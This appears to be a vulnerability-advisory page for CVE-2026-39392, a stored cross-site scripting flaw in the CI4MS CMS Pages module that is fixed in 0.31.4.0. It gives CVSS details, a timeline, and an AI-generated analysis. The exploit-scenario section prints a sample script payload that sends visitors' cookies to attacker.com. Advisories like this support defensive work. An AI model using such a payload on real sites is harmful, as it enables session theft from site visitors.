What is the CVSS score of CVE-2026-39392?

CVE-2026-39392 has a CVSS 3.1 base score of 5.5 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N. EPSS exploitation probability: 0.0%.

Is there a patch available for CVE-2026-39392?

Yes, a patch is available for CVE-2026-39392. Update the affected software to the latest version immediately.

Ci4ms CVE-2026-39392

EUVD-2026-20485 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-04-08 GitHub_M

GHSA-fjpj-6qcq-6pw2

XSS Ci4ms

5.5

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

5.5 MEDIUM

AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

High

User Interaction

None

Scope

Changed

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

Patch released

Apr 09, 2026 - 02:30 nvd

Patch available

EUVD ID Assigned

Apr 08, 2026 - 15:16 euvd

EUVD-2026-20485

Analysis Generated

Apr 08, 2026 - 15:16 vuln.today

CVE Published

Apr 08, 2026 - 14:30 nvd

MEDIUM 5.5

DescriptionGitHub Advisory

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.4.0, the Pages module does not apply the html_purify validation rule to content fields during create and update operations, while the Blog module does. Page content is stored unsanitized in the database and rendered as raw HTML on the public frontend via echo $pageInfo->content. An authenticated admin with page-editing privileges can inject arbitrary JavaScript that executes in the browser of every public visitor viewing the page. This vulnerability is fixed in 0.31.4.0.

AnalysisAI

Stored cross-site scripting (XSS) in CI4MS prior to 0.31.4.0 allows authenticated administrators with page-editing privileges to inject arbitrary JavaScript into page content that executes in the browsers of all public visitors. The Pages module fails to apply HTML sanitization during content creation and updates, storing unsanitized HTML directly in the database and rendering it without escaping on the frontend, whereas the Blog module correctly implements this protection. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	CVSS 5.5 reflects a network-based attack with low complexity and no user interaction required (UI:N), but requires high-privilege credentials (PR:H), limiting the attack surface to administrators or compromised admin accounts. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker with compromised or legitimately-held administrator credentials logs into CI4MS and navigates to the Pages module. They create or edit a page and inject a JavaScript payload (e.g., <script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>) into the page content field. …
Remediation	Vendor-released patch: CI4MS 0.31.4.0 or later. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-39392 vulnerability details – vuln.today

Back